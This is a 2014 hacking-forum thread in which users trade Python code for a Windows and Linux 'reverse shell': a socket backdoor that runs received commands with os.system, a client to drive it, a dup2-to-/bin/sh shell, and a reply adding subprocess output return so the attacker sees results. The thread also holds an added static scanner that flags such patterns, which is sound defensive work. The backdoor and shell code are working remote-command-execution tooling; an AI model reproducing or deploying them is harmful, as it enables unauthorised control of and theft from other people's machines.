Author Topic: Python Windows Reverse shell...  (Read 2933 times)

$Clone
Python Windows Reverse shell...
« on: August 17, 2014, 01:09:21 am »
Hey, can someone tell me if this is the right way to do a reverse shell in Python? :-\ I tried it in the script below:
https://evilzone.org/scripting-languages/python-virus-102/

Reverse Shell Script:
Code: (Python)

import socket
import os

def BackConnect():
    '''Executing remote commands via "backdoor"...never mind!'''
    command=""
    s=socket.socket()
    port=4444
    host=socket.gethostname()
    s.bind((host,port))
    s.listen(10)
    while True:
        ip,addr=s.accept()
        ip.send("Connected to localhost:")
        while command!="quit":
            ip.send("Enter Command:\t 'quit' to stop")
            command=ip.recv(2222)
            res=os.system(command)
            if res==0 and command!="quit":
                ip.send("Command executed successfuly!")
            elif res==1 and command=="quit":
                ip.send("Disconnecting....Goodbye!")
            else:
                ip.send("Command error!")
        s.close() 

BackConnect()


Client script is:

Code: (Python)

#This is client.py file

import socket               # Import socket module

s = socket.socket()         # Create a socket object
host = socket.gethostname() # Get local machine name
port = 4444                 #Reserve a port for your service.

if s.connect_ex((host, port))==0:
    print s.recv(1024)
    while True:
        print s.recv(3456)
        command=raw_input("Enter command:")
        s.send(command)
        print"-----------------------------------"
        print s.recv(1234)
        print"-----------------------------------"
   
s.close()                     # Close the socket when done


Linux is quite easy; one can use netcat, a shell script or a reverse script in Python, Perl, Ruby, Lua, etc.

Code: (Python)

import socket
import subprocess
import os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
port=4444
host=socket.gethostname()
s.connect((host,port))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

Not real... but something like that :P.

In Windows... how can I send the command results data back to me? I know of PsTools, but how can we implement it in Python for Windows? Metasploit does this very well.

 
« Last Edit: August 17, 2014, 01:13:23 am by $Clone »

DeXtreme
Re: Python Windows Reverse shell...
« Reply #1 on: August 17, 2014, 03:30:44 am »
Well, I don't think it's much of a shell if you don't receive any output from the command you execute. Try something like this instead:

Code: (Python)
# receive command
cmd=con.recv(1024)

# execute command
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,\
                stderr=subprocess.PIPE, stdin=subprocess.PIPE)
out,err=proc.communicate()

# send output
con.send(out+err)

subprocess.Popen returns the result of the command executed. Check out https://evilzone.org/projects-and-discussion/project-shebang/15/ for the full code.
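
As an added example (not part of any post in this thread): the snippets above pass bytes from `recv()` straight into `os.system` or `subprocess.Popen(..., shell=True)`, or wire a socket onto stdin/stdout/stderr with `os.dup2`, and a code reviewer or scanner can flag those patterns statically. The function name `find_remote_exec`, the sink list and the sample input are assumptions made for this example.

```python
import ast

# Calls that hand a string to a shell or spawn a process.
EXEC_SINKS = {"os.system", "os.popen", "subprocess.Popen", "subprocess.call",
              "subprocess.run", "subprocess.check_output"}

def dotted(node):
    """Render an Attribute/Name chain as 'a.b'; '' for anything else."""
    if isinstance(node, ast.Attribute):
        base = dotted(node.value)
        return f"{base}.{node.attr}" if base else node.attr
    return node.id if isinstance(node, ast.Name) else ""

def find_remote_exec(source):
    """Return sorted (line, finding) pairs; flow-insensitive, no alias tracking."""
    tree = ast.parse(source)
    tainted, findings = set(), []
    for node in ast.walk(tree):          # pass 1: names assigned from x.recv(...)
        if (isinstance(node, ast.Assign) and isinstance(node.value, ast.Call)
                and dotted(node.value.func).endswith(".recv")):
            tainted.update(t.id for t in node.targets if isinstance(t, ast.Name))
    for node in ast.walk(tree):          # pass 2: sinks fed by those names
        if not isinstance(node, ast.Call):
            continue
        name, args = dotted(node.func), node.args
        if name in EXEC_SINKS and any(
                isinstance(a, ast.Name) and a.id in tainted for a in args):
            findings.append((node.lineno, f"recv() data reaches {name}"))
        if (name == "os.dup2" and len(args) == 2
                and isinstance(args[0], ast.Call)
                and dotted(args[0].func).endswith(".fileno")
                and isinstance(args[1], ast.Constant) and args[1].value in (0, 1, 2)):
            findings.append((node.lineno, f"socket fd duplicated onto stdio fd {args[1].value}"))
    return sorted(findings)

# Constructed sample, modelled on the fragments quoted in this thread.
SAMPLE = """\
import os, socket, subprocess
con = socket.socket()
cmd = con.recv(1024)
os.system(cmd)
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
os.dup2(con.fileno(), 0)
subprocess.call(["ipconfig"])
"""

if __name__ == "__main__":
    for line, finding in find_remote_exec(SAMPLE):
        print(f"line {line}: {finding}")
```

The last line of the sample is not reported because its argument is a fixed list rather than data read from the socket.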

$Clone
Re: Python Windows Reverse shell...
« Reply #2 on: August 17, 2014, 11:50:30 am »
Thanks a lot, but what if I enter the command "cd directory"... I think it hangs... ???

DeXtreme
Re: Python Windows Reverse shell...
« Reply #3 on: August 17, 2014, 04:28:27 pm »
It opens a new process each time, executes the command and terminates the process, so it doesn't keep track of directories you've cd'ed into. You might have to code that feature yourself or "ls" a lot.
« Last Edit: August 17, 2014, 04:31:16 pm by DeXtreme »

$Clone
Re: Python Windows Reverse shell...
« Reply #4 on: August 17, 2014, 04:55:28 pm »
I see... but I theoretically thought if one could create an instance of cmd then this would be much better, but I guess I will have to figure that out... but how does Metasploit do it with  and stuff...???
http://www.offensive-security.com/metasploit-unleashed/Meterpreter_Basics

Btw, what prog lang are you specialized in... if you don't mind me asking?